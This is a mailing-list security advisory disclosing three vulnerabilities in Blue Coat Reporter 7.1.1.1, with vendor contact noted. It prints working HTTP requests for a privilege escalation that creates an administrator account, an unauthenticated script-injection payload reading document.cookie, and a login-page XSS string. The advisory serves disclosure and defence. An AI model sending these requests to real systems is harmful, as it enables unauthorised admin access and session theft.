<<< Date Index >>>     <<< Thread Index >>>

Blue Coat Reporter multiple remote vulnerabilities



Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
============================================================
 
Blue Coat Reporter
==================
 
"Blue Coat Reporter 7 provides identity-based reporting on Web
communications enabling enterprises to evaluate Web policies and manage
network resources more effectively. "
 
Product/Version
===============
 
Blue Coat Reporter 7.1.1.1
Running on Win32
 
Vulnerabilities
===============
 
a) Privilege escalation
 
    A user without administrative privileges is able to create a useraccount
with administrative privileges.
 
b) HTML-Code Injection
 
    Unauthenticated users can inject html-code into the application. The
code will be executed, if an authenticated user is viewing the affected
website.
 
c) Cross Site Scripting at login page
 
    Supplying scriptcode instead of a valid username at the login page will
end in a cross site scripting.
 
 
Exploiting
==========
 
a) Privlege escalation
 
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account 
3) Sent the following request to create a user hurz with password hurz and
admin privileges.
 
 POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
 Referer:
http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
 Accept-Language: de
 Content-Type: application/x-www-form-urlencoded
 Proxy-Connection: Keep-Alive
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 Host: 192.168.142.133:8987
 Pragma: no-cache
 Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
 Content-Length: 170
 

submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
 
b) HTML-Code Injection
 
POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100


volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script>
 
 
c) Cross Site Scripting at login page
 
Supply the following username at the login page: 
"/><script>alert("BlueGoat")</script>
 
 
Vendor
======
 
Blue Coat was responding to my message very fast and in a very professional
way. Exemplary!
 
Homepage: http://www.bluecoat.com
Advisory:
http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
 
Discovered
==========
 
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm

-- 
Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie!
Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl